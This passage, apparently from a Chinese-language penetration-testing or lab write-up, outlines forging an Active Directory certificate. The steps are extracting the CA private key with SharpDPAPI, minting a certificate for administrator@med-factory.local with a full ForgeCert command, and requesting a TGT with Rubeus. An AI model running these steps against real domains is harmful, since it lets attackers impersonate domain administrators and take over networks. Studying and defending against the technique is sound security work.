伪造的证书

在 CA 上，也就是 Dc03 上，使用工具 SharpDPAPI 来提取 CA 的私钥：

 

将私钥连同证书一起保存为 pem 格式文件，然后使用下面的 openssl 命令将其转换为 pfx 格式。

使用工具 ForgeCert (https://github.com/GhostPack/ForgeCert) 伪造证书，其中用户名需要是域内存在的。

ForgeCert.exe --CaCertPath C:\windows\tasks\cert.pfx --CaCertPassword 123123 --Subject "CN=User" --SubjectAltName "administrator@med-factory.local" --NewCertPath c:\windows\tasks\fake.pfx --NewCertPassword 123123

 

最后，使用 Rubeus 通过证书的方式请求用户的 TGT。